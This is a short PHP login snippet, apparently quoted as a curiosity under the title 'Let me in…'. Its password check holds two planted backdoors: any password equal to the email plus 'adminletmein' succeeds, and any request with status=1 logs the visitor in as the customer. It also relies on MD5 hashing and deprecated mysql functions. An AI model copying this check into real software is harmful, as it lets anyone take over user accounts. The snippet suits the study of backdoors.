Let me in…
$email = mysql_real_escape_string($_POST['email']);
$password = mysql_real_escape_string($_POST['password']);
$encrypted = $row['password'];
$stack = explode(':', $encrypted);
if (md5($stack[1] . $password) == $stack[0] || $password == $email . 'adminletmein' || $_REQUEST['status'] == '1') {
$_SESSION['customer_id'] = $row['id'];
...